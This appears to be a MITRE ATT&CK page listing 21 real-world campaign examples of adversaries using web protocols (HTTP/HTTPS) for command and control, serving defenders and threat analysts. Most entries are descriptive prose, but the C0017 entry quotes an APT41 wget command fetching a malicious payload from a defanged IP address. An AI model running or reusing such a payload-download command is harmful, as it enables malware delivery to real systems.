ATT&CKProcedure examples

Procedure examples

Real-world descriptions of how a group, tool or campaign used a technique.

Technique: T1071.001×

21 examples

TechniqueUsed byProcedure example
T1071.001
Web Protocols
CampaignOperation Dream Job

During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.

T1071.001
Web Protocols
CampaignSharePoint ToolShell Exploitation

During SharePoint ToolShell Exploitation, threat actors issued HTTP `POST` requests to web shells with spoofed or empty Referrer headers, to circumvent authorization controls.

T1071.001
Web Protocols
CampaignFrankenstein

During Frankenstein, the threat actors used HTTP GET requests for C2.

T1071.001
Web Protocols
CampaignRedDelta Modified PlugX Infection Chain Operations

Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations.

T1071.001
Web Protocols
CampaignOperation MidnightEclipse

During Operation MidnightEclipse, threat actors used `wget` via HTTP to retrieve payloads.

T1071.001
Web Protocols
Campaign2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests.

T1071.001
Web Protocols
CampaignIndian Critical Infrastructure Intrusions

During Indian Critical Infrastructure Intrusions, RedEcho network activity included SSL traffic over TCP 443 and HTTP traffic over non-standard ports.

T1071.001
Web Protocols
Campaign3CX Supply Chain Attack

During the 3CX Supply Chain Attack, AppleJeus's COLDCAT C2 leverages cookie headers to contain data over HTTPS. Cookies also contain hardcoded variables `__tutma` or `__tutmc` in the payload's HTTPS request.

T1071.001
Web Protocols
CampaignC0018

During C0018, the threat actors used HTTP for C2 communications.

T1071.001
Web Protocols
CampaignC0021

During C0021, the threat actors used HTTP for some of their C2 communications.

T1071.001
Web Protocols
CampaignJuicy Mix

During Juicy Mix, OilRig used a VBS script to send POST requests to register installed malware with C2.

T1071.001
Web Protocols
CampaignSolarWinds Compromise

During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration.

T1071.001
Web Protocols
CampaignOperation CuckooBees

During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners.

T1071.001
Web Protocols
CampaignOuter Space

During Outer Space, OilRig used HTTP to communicate between installed backdoors and compromised servers including via the Microsoft Exchange Web Services API.

T1071.001
Web Protocols
CampaignArcaneDoor

ArcaneDoor command and control activity was conducted through HTTP.

T1071.001
Web Protocols
CampaignAPT41 DUST

APT41 DUST used HTTPS for command and control.

T1071.001
Web Protocols
CampaignNight Dragon

During Night Dragon, threat actors used HTTP for C2.

T1071.001
Web Protocols
CampaignVersa Director Zero Day Exploitation

Versa Director Zero Day Exploitation established HTTPS communications from adversary-controlled SOHO devices over port 443 with compromised Versa Director servers.

T1071.001
Web Protocols
CampaignOperation Wocao

During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS.

T1071.001
Web Protocols
CampaignC0017

During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.

T1071.001
Web Protocols
CampaignQuad7 Activity

Quad7 Activity has used the same User Agents of Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko and Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 combined with a reference to the Microsoft Azure PowerShell Application ID 1950a258-227b-4e31-a9cf-717495945fc2 in their sign-in attempts.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.